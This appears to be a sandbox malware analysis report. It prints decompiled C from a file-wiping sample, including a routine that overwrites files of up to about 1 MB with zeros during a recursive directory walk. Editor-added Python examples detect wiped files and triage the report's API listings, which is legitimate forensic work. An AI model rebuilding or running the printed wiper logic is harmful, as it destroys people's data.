    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
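    The two routines that decide the sample's impact are E00141441 above (the recursive directory walk) and E0014117C, the routine it hands every file of at most 0xF4240 bytes to (listed further down among the non-executed functions; its API sequence is already visible in the "Part of subcall function 0014117C" lines above). What follows is an added example written for this report, not code from the sample or from Joe Sandbox: a read-only Python model of that walk which labels each file with the branch the sample would take, plus the two content checks an incident responder would run over a suspect volume to find files the routines have already been through. The directory order, the use of os.access as a stand-in for the CreateFileW(GENERIC_WRITE) success test, the reading of E00144DA0(&buf, 0, 0x1000) as memset, and the expectation for the large-file branch (E001410F5 seeks to 0xFFFFFFFF from FILE_BEGIN, which is an invalid seek, so its single 0x1000-byte WriteFile is expected at offset 0) are the editor's assumptions; the fixture tree is constructed.

```python
"""Read-only model of the directory walk in E00141441 and of the end state that
E0014117C leaves behind. Added example for this report, not the sample's code.
Nothing here writes to disk except the throw-away fixture demo() builds in a
temporary directory.
"""
import os
import shutil
import tempfile
from pathlib import Path
from typing import Dict, Iterator, Tuple

SMALL_FILE_LIMIT = 0xF4240  # 1,000,000 bytes: the bound E00141441 compares the GetFileSizeEx result against
CHUNK = 0x1000              # the WriteFile length used by E0014117C and by E001410F5


def walk_like_sample(root: Path) -> Iterator[Tuple[Path, str]]:
    """Yield (path, branch) for every file E00141441 would reach below root.

    The sample enumerates "<dir>\\*", recurses into entries carrying
    FILE_ATTRIBUTE_DIRECTORY (0x10) unless they are named "." or "..", opens
    everything else with GENERIC_WRITE and routes by size: at most
    SMALL_FILE_LIMIT goes to E0014117C ("small"), larger goes to E001410F5
    ("large"). A file that cannot be opened for writing is left alone; os.access
    stands in for that CreateFileW failure (assumption). Name order is used
    because FindFirstFileW order depends on the filesystem (assumption).
    """
    with os.scandir(root) as it:
        entries = sorted(it, key=lambda e: e.name)
    for entry in entries:
        path = Path(entry.path)
        if entry.is_dir(follow_symlinks=False):
            yield from walk_like_sample(path)  # the recursive self-call at 0x141510
        elif not os.access(path, os.W_OK):
            yield path, "skipped"
        else:
            size = entry.stat(follow_symlinks=False).st_size
            yield path, "small" if size <= SMALL_FILE_LIMIT else "large"


def is_zero_filled(path: Path) -> bool:
    """True when every byte is NUL, the end state E0014117C leaves behind.

    That routine zeroes a CHUNK-sized buffer (E00144DA0 read as memset, an
    assumption), overwrites the last byte to prove the file is writable, then
    rewrites size bytes from offset 0 in CHUNK pieces. Length is preserved, so
    content, not size, is the indicator. Empty files return True; ignore them.
    """
    with open(path, "rb") as fh:
        while True:
            block = fh.read(CHUNK)
            if not block:
                return True
            if block.count(0) != len(block):
                return False


def head_is_zeroed(path: Path) -> bool:
    """True when only the first CHUNK bytes of a longer file are NUL.

    E001410F5 (large files) issues one CHUNK write after SetFilePointer(h,
    0xFFFFFFFF, NULL, FILE_BEGIN). A negative seek from FILE_BEGIN fails and
    leaves the pointer at 0, so the write is expected at offset 0 (assumption:
    the listing shows neither a return check nor the buffer contents). Treat a
    hit as a lead to confirm against the disk image, not as proof.
    """
    with open(path, "rb") as fh:
        head = fh.read(CHUNK)
        longer = fh.read(1) != b""
    return longer and head.count(0) == CHUNK and not is_zero_filled(path)


def classify_file(path: Path) -> str:
    if is_zero_filled(path):
        return "zero-filled"
    if head_is_zeroed(path):
        return "head-zeroed"
    return "intact"


def build_fixture(root: Path) -> None:
    """Constructed tree; sizes straddle the sample's threshold."""
    (root / "docs").mkdir()
    (root / "docs" / "note.txt").write_bytes(b"quarterly numbers\n")
    (root / "big.bin").write_bytes(b"\x55" * (SMALL_FILE_LIMIT + 1))
    (root / "big_hit.bin").write_bytes(b"\x00" * CHUNK + b"\xaa" * SMALL_FILE_LIMIT)
    (root / "wiped.txt").write_bytes(b"\x00" * 17)


def demo() -> Dict[str, str]:
    """Run the model over the fixture; returns {relative path: "branch/state"}."""
    root = Path(tempfile.mkdtemp(prefix="e00141441_model_"))
    try:
        build_fixture(root)
        return {
            path.relative_to(root).as_posix(): f"{branch}/{classify_file(path)}"
            for path, branch in walk_like_sample(root)
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{verdict:20} {name}")
```

    Run it against a mounted image instead of the fixture by calling walk_like_sample(Path("/mnt/evidence")) and classify_file on each result; "zero-filled" hits of the sample's own length are the small-file routine's signature, and because length is preserved, size-based triage alone will not find them.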
    APIs
      • Part of subcall function 001427EA: EncodePointer.KERNEL32(00000000,00141CA9,?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 001427EC
    • LoadLibraryW.KERNEL32(USER32.DLL), ref: 001438C6
    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 001438E2
    • EncodePointer.KERNEL32(00000000), ref: 001438F3
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00143900
    • EncodePointer.KERNEL32(00000000), ref: 00143903
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00143910
    • EncodePointer.KERNEL32(00000000), ref: 00143913
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00143920
    • EncodePointer.KERNEL32(00000000), ref: 00143923
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00143934
    • EncodePointer.KERNEL32(00000000), ref: 00143937
    • DecodePointer.KERNEL32(00000000,00149E88,00000314,00000000), ref: 00143959
    • DecodePointer.KERNEL32 ref: 00143963
    • DecodePointer.KERNEL32(?,00149E88,00000314,00000000), ref: 001439A2
    • DecodePointer.KERNEL32(?), ref: 001439BC
    • DecodePointer.KERNEL32(00149E88,00000314,00000000), ref: 001439D0
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 78% (the report's per-line address column is appended to each line as a // @0x comment)
    E00141E00(void* __edx, void* _a4) {
        signed int _v8;
        struct HINSTANCE__* _v9;
        void _v508;
        long _v512;
        void* __ebx;
        void* __edi;
        void* __esi;
        signed int _t18;
        signed int _t23;
        short _t28;
        void* _t32;
        void* _t34;
        void* _t37;
        long _t38;
        void* _t39;
        struct HINSTANCE__* _t40;
        void* _t52;
        long _t53;
        void* _t54;
        signed int _t55;
        void* _t56;
        void* _t57;

        _t52 = __edx; // @0x00141e00
        _t18 =  *0x149004; // 0x20251455 @0x00141e0b
        _v8 = _t18 ^ _t55; // @0x00141e12
        _t54 = _a4; // @0x00141e17
        _t53 = E00141DDA(_t54); // @0x00141e21
        _t40 = 0; // @0x00141e23
        _v512 = _t53; // @0x00141e26
        if(_t53 != 0) { // @0x00141e2e
            if(E00143BB7(3) == 1 || E00143BB7(3) == 0 &&  *0x149000 == 1) { // @0x00141e3f
                _t54 = GetStdHandle(0xfffffff4); // @0x00141f54
                if(_t54 != _t40 && _t54 != 0xffffffff) { // @0x00141f58
                    _t23 = 0; // @0x00141f5f
                    while(1) { // @0x00141f61
                         *((char*)(_t55 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t53 + _t23 * 2)); // @0x00141f64
                        if( *((intOrPtr*)(_t53 + _t23 * 2)) == _t40) { // @0x00141f6f
                            break;
                        }
                        _t23 = _t23 + 1; // @0x00141f71
                        if(_t23 < 0x1f4) { // @0x00141f77
                            continue;
                        }
                        break;
                    } // @0x00141f77
                    _v9 = _t40; // @0x00141f88
                    _t20 = WriteFile(_t54,  &_v508, E00143800( &_v508),  &_v512, _t40); // @0x00141f9a
                } // @0x00141f9a
            } else { // @0x00141e5e
                if(_t54 != 0xfc) { // @0x00141e64
                    _t53 = 0x149e88; // @0x00141e74
                    _t28 = E00143B54(0x149e88, 0x314, L"Runtime Error!\n\nProgram: "); // @0x00141e7a
                    _t57 = _t56 + 0xc; // @0x00141e7f
                    if(_t28 != 0) { // @0x00141e84
                        _push(_t40); // @0x00141f42
                        _push(_t40); // @0x00141f43
                        _push(_t40); // @0x00141f44
                        _push(_t40); // @0x00141f45
                        _push(_t40); // @0x00141f46
                        goto L9;
                    } else { // @0x00141e8a
                        _t54 = 0x149eba; // @0x00141e8f
                         *0x14a0c2 = _t28; // @0x00141e96
                        _t38 = GetModuleFileNameW(_t40, 0x149eba, 0x104); // @0x00141e9c
                        _t40 = 0x2fb; // @0x00141ea2
                        if(_t38 == 0) { // @0x00141ea9
                            _t39 = E00143B54(0x149eba, 0x2fb, L"<program name unknown>"); // @0x00141eb2
                            _t57 = _t57 + 0xc; // @0x00141eb7
                            if(_t39 != 0) { // @0x00141ebc
                                L8: // @0x00141ebe
                                _push(0); // @0x00141ec0
                                _push(0); // @0x00141ec1
                                _push(0); // @0x00141ec2
                                _push(0); // @0x00141ec3
                                _push(0); // @0x00141ec4
                                L9: // @0x00141ec5
                                E00143464(); // @0x00141ec5
                            } // @0x00141ec5
                        } // @0x00141ebc
                    } // @0x00141ea9
                    if(E00143B39(_t54) + 1 > 0x3c) { // @0x00141ed5
                        _t40 = _t40 - (0x149e44 + E00143B39(_t54) * 2 - _t54 >> 1); // @0x00141ef1
                        _t37 = E00143A6C(0x149e44 + E00143B39(_t54) * 2, _t40, L"...", 3); // @0x00141ef5
                        _t57 = _t57 + 0x14; // @0x00141efa
                        if(_t37 != 0) { // @0x00141eff
                            goto L8;
                        }
                    } // @0x00141eff
                    _t54 = 0x314; // @0x00141f06
                    _t32 = E001439F7(_t53, 0x314, L"\n\n"); // @0x00141f0d
                    _t57 = _t57 + 0xc; // @0x00141f12
                    if(_t32 != 0) { // @0x00141f17
                        goto L8;
                    }
                    _t34 = E001439F7(_t53, 0x314, _v512); // @0x00141f21
                    _t57 = _t57 + 0xc; // @0x00141f26
                    if(_t34 != 0) { // @0x00141f2b
                        goto L8;
                    }
                    _t20 = E0014388B(_t52, _t53, L"Microsoft Visual C++ Runtime Library", 0x12010); // @0x00141f38
                } // @0x00141f3d
            } // @0x00141e64
        } // @0x00141e3f
        return E001417EA(_t20, _t40, _v8 ^ _t55, _t52, _t53, _t54); // @0x00141fae
    }

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,00149EBA,00000104), ref: 00141E9C
      • Part of subcall function 00143464: GetCurrentProcess.KERNEL32(C0000417), ref: 0014347A
      • Part of subcall function 00143464: TerminateProcess.KERNEL32(00000000), ref: 00143481
    • _wcslen.LIBCMT ref: 00141ECB
    • _wcslen.LIBCMT ref: 00141ED8
      • Part of subcall function 0014388B: LoadLibraryW.KERNEL32(USER32.DLL), ref: 001438C6
      • Part of subcall function 0014388B: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 001438E2
      • Part of subcall function 0014388B: EncodePointer.KERNEL32(00000000), ref: 001438F3
      • Part of subcall function 0014388B: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00143900
      • Part of subcall function 0014388B: EncodePointer.KERNEL32(00000000), ref: 00143903
      • Part of subcall function 0014388B: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00143910
      • Part of subcall function 0014388B: EncodePointer.KERNEL32(00000000), ref: 00143913
      • Part of subcall function 0014388B: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00143920
      • Part of subcall function 0014388B: EncodePointer.KERNEL32(00000000), ref: 00143923
      • Part of subcall function 0014388B: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00143934
      • Part of subcall function 0014388B: EncodePointer.KERNEL32(00000000), ref: 00143937
      • Part of subcall function 0014388B: DecodePointer.KERNEL32(00000000,00149E88,00000314,00000000), ref: 00143959
      • Part of subcall function 0014388B: DecodePointer.KERNEL32 ref: 00143963
      • Part of subcall function 0014388B: DecodePointer.KERNEL32(?,00149E88,00000314,00000000), ref: 001439A2
      • Part of subcall function 0014388B: DecodePointer.KERNEL32(?), ref: 001439BC
      • Part of subcall function 0014388B: DecodePointer.KERNEL32(00149E88,00000314,00000000), ref: 001439D0
    • GetStdHandle.KERNEL32(000000F4), ref: 00141F4E
    • _strlen.LIBCMT ref: 00141F8B
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00141F9A
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
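    Every function record on this page carries an "APIs" list in the same line format, which makes the report easy to triage mechanically: a function's own calls are bulleted at the margin, calls inherited from its callees are indented and prefixed "Part of subcall function <addr>:", and "ref:" gives the address of the call instruction. The executed functions above (E00141B9B, E0014523E, E00143608, E00142C5E, E001444AD) and E00141E00 call only EncodePointer/DecodePointer, HeapCreate/RtlAllocateHeap, Sleep and LIBCMT symbols, or assemble the "Runtime Error!" banner, which is consistent with Visual C++ CRT start-up, the calloc implementation (the 0xFFFFFFE0 bound is its maximum request size) and the runtime-error writer rather than with the sample's own logic; E00141441 is the first record whose direct calls touch the filesystem. The block below is an added example, not part of Joe Sandbox: a parser for the "APIs" lines and a classifier driven by two name sets. The two sample listings are copied from the E00141B9B and E00141441 records on this page; the name sets, the labels, and the rule "any filesystem API wins, otherwise all-CRT means crt-like" are the editor's assumptions to tune per sample.

```python
"""Parser and triage heuristic for the per-function "APIs" lists in this report.

Added example; not Joe Sandbox code. The name sets below are an analyst's
assumption and should be tuned per sample.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# One bullet per line. Direct call:     "• Name.MODULE(args), ref: ADDR"
# Inherited call: "  • Part of subcall function ADDR: Name.MODULE(args), ref: ADDR"
# The "(args)" part is absent on some entries ("• _wcslen.LIBCMT ref: 00141ECB").
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<via>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w#]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]   # as printed; "?" means the sandbox could not recover the value
    ref: int                # address of the call instruction
    via: Optional[int]      # callee whose record the call was inherited from, if any


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse one "APIs" section; lines that are not API bullets are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(m["args"].split(",")) if m["args"] else ()
        via = int(m["via"], 16) if m["via"] else None
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), via))
    return calls


def direct_calls(calls: List[ApiCall]) -> List[ApiCall]:
    return [c for c in calls if c.via is None]


def subcall_targets(calls: List[ApiCall]) -> Set[int]:
    """Callees this function reaches, recovered from the inherited bullets."""
    return {c.via for c in calls if c.via is not None}


# Assumed name sets (editor's choice, not from the report). CRT_NAMES is what the
# CRT start-up, heap and error-reporting records on this page call directly.
CRT_NAMES = {
    "EncodePointer", "DecodePointer", "HeapCreate", "RtlAllocateHeap", "Sleep",
    "__initterm_e", "__FindPESection", "_wcslen", "_strlen", "GetModuleFileNameW",
    "GetStdHandle", "WriteFile", "LoadLibraryW", "GetProcAddress",
    "IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter",
    "GetCurrentProcess", "TerminateProcess",
}
FILESYSTEM_NAMES = {
    "FindFirstFileW", "FindNextFileW", "FindClose", "CreateFileW",
    "GetFileSizeEx", "SetFilePointer", "PathAppendW",
}


def classify(calls: List[ApiCall]) -> str:
    """'filesystem' if the function itself touches files, 'crt-like' if every
    direct call is in CRT_NAMES, else 'unclassified'. Inherited calls are left
    out on purpose: every record on this page inherits IsDebuggerPresent and
    TerminateProcess from E001417EA, which says nothing about the function."""
    names = {c.name for c in direct_calls(calls)}
    if names & FILESYSTEM_NAMES:
        return "filesystem"
    if names and names <= CRT_NAMES:
        return "crt-like"
    return "unclassified"


# Two listings copied verbatim from the records above (E00141B9B and E00141441).
INITTERM_BLOCK = """APIs
  • Part of subcall function 0014368C: EncodePointer.KERNEL32(2657F566,?,?,00141BC7), ref: 00143698
• __initterm_e.LIBCMT ref: 00141BD1
  • Part of subcall function 00143740: __FindPESection.LIBCMT ref: 0014379B
"""
WALK_BLOCK = """APIs
• wsprintfW.USER32 ref: 0014146D
• FindFirstFileW.KERNEL32(?,?), ref: 00141484
• HeapAlloc.KERNEL32(00000000), ref: 001414AF
• PathAppendW.SHLWAPI(00000000,?), ref: 001414C2
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000), ref: 0014153D
  • Part of subcall function 0014117C: WriteFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 0014128B
• FindNextFileW.KERNEL32(?,00000010), ref: 001415A2
"""

if __name__ == "__main__":
    for label, block in (("E00141B9B", INITTERM_BLOCK), ("E00141441", WALK_BLOCK)):
        calls = parse_api_block(block)
        print(label, classify(calls), [c.name for c in direct_calls(calls)],
              [hex(a) for a in sorted(subcall_targets(calls))])
```

    Feeding every "APIs" section of the report through parse_api_block and subcall_targets also yields the static call graph (E00141441 reaches E0014117C, E001410F5 and E001417EA) without opening the sample in a disassembler, which is a quick way to decide which non-executed functions deserve a second run with a different cookbook.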
    C-Code - Quality: 81% (the report's per-line address column is appended to each line as a // @0x comment)
    E0014117C(WCHAR* __ecx, void* __edx) {
        signed int _v8;
        void _v4108;
        struct _OVERLAPPED* _v4112;
        struct _OVERLAPPED* _v4116;
        long _v4120;
        struct _OVERLAPPED* _v4124;
        long _v4128;
        long _v4136;
        void* __ebx;
        void* __edi;
        void* __esi;
        signed int _t28;
        long _t37;
        long _t40;
        int _t43;
        long _t46;
        long _t48;
        WCHAR* _t50;
        void* _t51;
        long _t53;
        long _t54;
        void* _t57;
        long* _t58;
        signed int _t60;

        _t57 = __edx; // @0x0014117c
        E00145B90(0x102c); // @0x00141184
        _t28 =  *0x149004; // 0x20251455 @0x00141189
        _v8 = _t28 ^ _t60; // @0x00141190
        _t58 =  &_v4120; // @0x0014119a
        _v4124 = 0; // @0x001411a5
        asm("stosd"); // @0x001411ab
        _t50 = __ecx; // @0x001411b4
        _v4128 = 0; // @0x001411b6
        _v4116 = 0; // @0x001411bc
        _v4112 = 0; // @0x001411c2
        E00144DA0( &_v4108, 0, 0x1000); // @0x001411c8
        _t51 = CreateFileW(_t50, 0x40000000, 0, 0, 3, 0x80, 0); // @0x001411e6
        if(_t51 != 0xffffffff) { // @0x001411eb
            _t58 = SetFilePointer; // @0x001411f8
            SetFilePointer(_t51, 0xffffffff, 0, 2); // @0x00141204
            _t37 = WriteFile(_t51,  &_v4108, 1,  &_v4128, 0); // @0x00141218
            __eflags = _t37; // @0x0014121e
            if(_t37 != 0) { // @0x00141220
                FlushFileBuffers(_t51); // @0x00141223
            } // @0x00141223
            __imp__GetFileSizeEx(_t51,  &_v4124); // @0x00141231
            SetFilePointer(_t51, 0, 0, 0); // @0x0014123b
            _t40 = _v4120; // @0x0014123d
            _t53 = _v4124; // @0x00141243
            __eflags = _t40; // @0x00141249
            if(_t40 >= 0) { // @0x0014124b
                goto L8;
            } else { // @0x0014124d
                __eflags = _t53; // @0x0014124d
                if(_t53 > 0) { // @0x0014124f
                    goto L8; // @0x00141251
                    do { // @0x00141259
                        while(1) { // @0x00141259
                            L8: // @0x00141259
                            _t54 = _t53 - _v4116; // @0x00141259
                            __eflags = _t54; // @0x00141259
                            asm("sbb eax, [ebp-0x100c]"); // @0x0014125f
                            _v4136 = _t40; // @0x00141265
                            if(_t54 != 0) { // @0x0014126b
                                goto L10;
                            }
                            __eflags = _t54 - 0x1000; // @0x0014126d
                            if(_t54 > 0x1000) { // @0x00141273
                                goto L10;
                            }
                            L11: // @0x0014127a
                            _t43 = WriteFile(_t51,  &_v4108, _t54,  &_v4128, 0); // @0x0014128b
                            __eflags = _t43; // @0x00141291
                            if(_t43 != 0) { // @0x00141293
                                _t48 = _v4128; // @0x00141295
                                __eflags = _t48; // @0x0014129b
                                if(_t48 != 0) { // @0x0014129d
                                    _v4116 = _v4116 + _t48; // @0x0014129f
                                    _t40 = _v4120; // @0x001412a5
                                    asm("adc [ebp-0x100c], esi"); // @0x001412ab
                                    __eflags = _v4112 - _t40; // @0x001412b1
                                    if(__eflags < 0) { // @0x001412b7
                                        _t53 = _v4124; // @0x00141253
                                        continue;
                                    } else { // @0x001412b9
                                        if(__eflags <= 0) { // @0x001412b9
                                            break;
                                        }
                                    } // @0x001412b9
                                } // @0x001412b7
                            } // @0x0014129d
                            goto L16;
                            L10: // @0x00141275
                            _t54 = 0x1000; // @0x00141275
                            goto L11;
                        } // @0x00141275
                        _t53 = _v4124; // @0x001412bb
                        __eflags = _v4116 - _t53; // @0x001412c1
                    } while (_v4116 <= _t53); // @0x001412c1
                } // @0x00141259
            } // @0x0014124f
            L16: // @0x001412c9
            FlushFileBuffers(_t51); // @0x001412ca
            CloseHandle(_t51); // @0x001412d1
            _t46 = 0; // @0x001412d7
            __eflags = 0; // @0x001412d7
        } else { // @0x001411ed
            _t46 = GetLastError(); // @0x001411ed
        } // @0x001411ed
        return E001417EA(_t46, _t51, _v8 ^ _t60, _t57, _t58, 0); // @0x001412e7
    }

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000), ref: 001411E0
    • GetLastError.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 001411ED
    • SetFilePointer.KERNEL32(00000000,000000FF,00000000,00000002,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 00141204
    • WriteFile.KERNEL32(00000000,?,00000001,?,00000000), ref: 00141218
    • FlushFileBuffers.KERNEL32(00000000), ref: 00141223
    • GetFileSizeEx.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 00141231
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 0014123B
    • WriteFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 0014128B
    • FlushFileBuffers.KERNEL32(00000000), ref: 001412CA
    • CloseHandle.KERNEL32(00000000), ref: 001412D1
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 79%
              			E00144E56(intOrPtr* _a4, int _a8, signed int _a12, char* _a16, int _a20, short* _a24, int _a28, int _a32, intOrPtr _a36) {
              				signed int _v8;
              				int _v12;
              				int _v16;
              				int _v20;
              				void* _v32;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t67;
              				int _t73;
              				short* _t75;
              				short* _t77;
              				short* _t78;
              				signed int _t81;
              				void* _t83;
              				int _t84;
              				int _t86;
              				signed int _t88;
              				void* _t90;
              				short* _t91;
              				char* _t96;
              				int _t99;
              				signed int _t108;
              				signed int _t109;
              				int _t112;
              				signed int _t113;
              				signed int _t115;
              				int _t116;
              
0x00144e5e    				_t67 =  *0x149004; // 0x20251455
0x00144e65    				_v8 = _t67 ^ _t115;
0x00144e68    				_t109 = _a20;
0x00144e72    				if(_t109 <= 0) {
0x00144e93    					L8:
0x00144e93    					_v12 = 0;
0x00144e99    					if(_a32 == 0) {
0x00144ea3    						_a32 =  *((intOrPtr*)( *_a4 + 4));
0x00144ea3    					}
0x00144ea6    					_t114 = MultiByteToWideChar;
0x00144ec9    					_t112 = MultiByteToWideChar(_a32, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _a20, 0, 0);
0x00144ecb    					_v20 = _t112;
0x00144ed0    					if(_t112 != 0) {
0x00144ed9    						if(__eflags <= 0) {
0x00144f1e    							L21:
0x00144f1e    							_v16 = 0;
0x00144f21    							L22:
0x00144f21    							__eflags = _v16;
0x00144f24    							if(_v16 == 0) {
0x00000000    								goto L11;
0x00000000    							}
0x00144f35    							_t75 = MultiByteToWideChar(_a32, 1, _a16, _a20, _v16, _t112);
0x00144f37    							__eflags = _t75;
0x00144f39    							if(_t75 == 0) {
0x0014501f    								L45:
0x00145022    								E00144D71(_v16);
0x00145027    								_t73 = _v12;
0x00000000    								goto L46;
0x0014502a    							}
0x00144f3f    							_t114 = LCMapStringW;
0x00144f51    							_t77 = LCMapStringW(_a8, _a12, _v16, _t112, 0, 0);
0x00144f53    							_v12 = _t77;
0x00144f56    							__eflags = _t77;
0x00144f58    							if(_t77 == 0) {
0x00000000    								goto L45;
0x00000000    							}
0x00144f63    							__eflags = _a12 & 0x00000400;
0x00144f66    							if((_a12 & 0x00000400) == 0) {
0x00144f91    								_t113 = _v12;
0x00144f94    								__eflags = _t113;
0x00144f96    								if(_t113 <= 0) {
0x00144fda    									L37:
0x00144fda    									_t112 = 0;
0x00144fda    									__eflags = 0;
0x00144fdc    									L38:
0x00144fdc    									__eflags = _t112;
0x00144fde    									if(_t112 != 0) {
0x00144ff0    										_t78 = LCMapStringW(_a8, _a12, _v16, _v20, _t112, _v12);
0x00144ff2    										__eflags = _t78;
0x00144ff4    										if(_t78 != 0) {
0x00144ff6    											_push(0);
0x00144ff7    											_push(0);
0x00144ff8    											__eflags = _a28;
0x00144ffb    											if(_a28 != 0) {
0x00145001    												_push(_a28);
0x00145004    												_push(_a24);
0x00144ffd    											} else {
0x00144ffd    												_push(0);
0x00144ffe    												_push(0);
0x00144ffe    											}
0x00145015    											_v12 = WideCharToMultiByte(_a32, 0, _t112, _v12, ??, ??, ??, ??);
0x00145015    										}
0x00145019    										E00144D71(_t112);
0x0014501e    									}
0x00000000    									goto L45;
0x00144fde    								}
0x00144f9c    								_t81 = 0xffffffe0;
0x00144f9d    								_t109 = _t81 % _t113;
0x00144f9f    								__eflags = _t81 / _t113 - 2;
0x00144fa2    								if(_t81 / _t113 < 2) {
0x00000000    									goto L37;
0x00000000    								}
0x00144fa4    								_t83 = _t113 + _t113 + 8;
0x00144fa8    								__eflags = _t83 - 0x400;
0x00144faa    								if(_t83 > 0x400) {
0x00144fc3    									_t84 = E001451AA(_t109, _t113, LCMapStringW, _t83);
0x00144fc9    									__eflags = _t84;
0x00144fcb    									if(_t84 != 0) {
0x00144fcd    										 *_t84 = 0xdddd;
0x00144fd3    										_t84 = _t84 + 8;
0x00144fd3    										__eflags = _t84;
0x00144fd3    									}
0x00144fd6    									_t112 = _t84;
0x00000000    									goto L38;
0x00144fd6    								}
0x00144fac    								E00145AA0(_t83);
0x00144fb1    								_t112 = _t116;
0x00144fb3    								__eflags = _t112;
0x00144fb5    								if(_t112 == 0) {
0x00000000    									goto L45;
0x00000000    								}
0x00144fb7    								 *_t112 = 0xcccc;
0x00144fbd    								_t112 = _t112 + 8;
0x00000000    								goto L38;
0x00144fbd    							}
0x00144f68    							_t86 = _a28;
0x00144f6b    							__eflags = _t86;
0x00144f6d    							if(_t86 != 0) {
0x00144f73    								__eflags = _v12 - _t86;
0x00144f76    								if(_v12 <= _t86) {
0x00144f8a    									LCMapStringW(_a8, _a12, _v16, _t112, _a24, _t86);
0x00144f8a    								}
0x00144f76    							}
0x00000000    							goto L45;
0x00144f6d    						}
0x00144edf    						_t88 = 0xffffffe0;
0x00144ee0    						_t109 = _t88 % _t112;
0x00144ee2    						__eflags = _t88 / _t112 - 2;
